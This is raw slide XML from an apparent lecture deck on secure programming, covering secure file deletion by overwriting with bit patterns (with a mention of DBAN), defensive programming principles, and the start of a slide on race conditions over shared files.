              </a:rPr>
              <a:t>remove</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>file</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="918702" y="4347321"/>
            <a:ext cx="8300084" cy="1927225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="9ACCFF"/>
          </a:solidFill>
          <a:ln w="26448">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="67310" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="102870">
              <a:lnSpc>
                <a:spcPts val="1614"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="530"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>patterns = [10101010, 01010101, 11001100, 00110011, 00000000, 11111111, …</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="50" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="102870" marR="6046470">
              <a:lnSpc>
                <a:spcPts val="1540"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>open file for</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-55" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>update  for each</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-20" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>pattern</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="423545">
              <a:lnSpc>
                <a:spcPts val="1455"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>seek to start of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>file</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="423545" marR="4011929">
              <a:lnSpc>
                <a:spcPts val="1540"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="105"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>overwrite file contents with pattern  flush application </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>write</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>buffers</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="102870" marR="3370579" indent="321310">
              <a:lnSpc>
                <a:spcPts val="1540"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="10"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>sync file system write buffers with device  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>close file</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="102870">
              <a:lnSpc>
                <a:spcPts val="1520"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>remove</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>file</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1221739" y="2016505"/>
            <a:ext cx="6852284" cy="452755"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="5139690" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>“Deleted” </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>files </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>are </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-15" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>really</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-15" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>gone.	How </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-80" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>fix?</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1069339" y="6349998"/>
            <a:ext cx="3895725" cy="851535"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" spc="-30" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Or, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>see DBAN </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-15" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>(“Darik’s </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Boot </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="20" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Nuke”)</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="15"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr sz="2300">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1153795">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>34</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9"/>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860801" y="1006855"/>
            <a:ext cx="4337050" cy="574040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Defensive</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-25" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Programming</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="840739" y="2001265"/>
            <a:ext cx="7601584" cy="4368800"/>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3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>A form of defensive design to ensure</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-270" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>continued  function of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>software </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>despite unforeseen</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-60" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>usage</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" marR="581025" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Requires attention to all aspects of program  execution, environment, data</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="20" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>processed</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Also </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>called secure</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="15" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>programming</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Assume nothing, check all potential</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-10" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>errors</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Rather than just focusing on solving</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-40" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>task</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Must </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>validate all</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="25" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>assumptions</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>OK </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>if </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>OK </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" i="1" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>vs. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>OK </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>if </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-25" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>OK.</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9396476" y="6962647"/>
            <a:ext cx="124460" cy="238760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12065" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>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2700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="13970">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Race</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-50" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Conditions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="993139" y="1832842"/>
            <a:ext cx="7477125" cy="4689475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="59055" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="355600" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="465"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Programs may access shared</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-25" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>resources</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i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>mailbox file, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>CGI data</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-70" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>file</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spc="-120" dirty="0">
                <a:latin typeface="Times New Roman"/>
